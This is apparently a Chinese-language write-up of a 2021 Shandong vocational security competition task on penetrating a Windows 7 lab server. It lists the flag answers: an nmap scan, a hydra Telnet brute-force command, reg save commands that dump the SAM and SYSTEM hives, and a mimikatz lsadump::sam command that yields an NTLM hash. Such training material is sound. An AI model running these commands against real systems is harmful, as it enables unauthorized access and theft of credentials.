2021年山东省中职组网络安全省赛B模块windows渗透解析

B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7

1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;

首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag:

2021年山东省中职组网络安全省赛B模块windows渗透解析_第1张图片

Flag:23

2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将hydra使用的必要参数当做FLAG进行提交(例:nmap-s-p22);(字典路径/usr/share/wordlists/dirb/small.txt)

2021年山东省中职组网络安全省赛B模块windows渗透解析_第2张图片

这一道题目那就使用hydra指定字典进行爆破:

Flag: hydra -l Administrator -P /usr/share/wordlists/dirb/small.txt 192.168.70.136 telnet

3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)

根据上面的题目:

Flag:123

4.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

2021年山东省中职组网络安全省赛B模块windows渗透解析_第3张图片

成功导出:

Flag:reg save HKLM\SAM sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;

根据上一道题目:

Flag:reg save HKLM\SYSTEM system.hiv

6.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取Administrator密码信息,将提取信息的命令作为FLAG提交;

2021年山东省中职组网络安全省赛B模块windows渗透解析_第4张图片

Flag: lsadump::sam /sam:C:\sam.hive /system:C:\system.hiv

7.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交

上一道题目得出:

Flag: 3dbde697d71690a769204beb12283678

你可能感兴趣的:(web安全,安全,windows)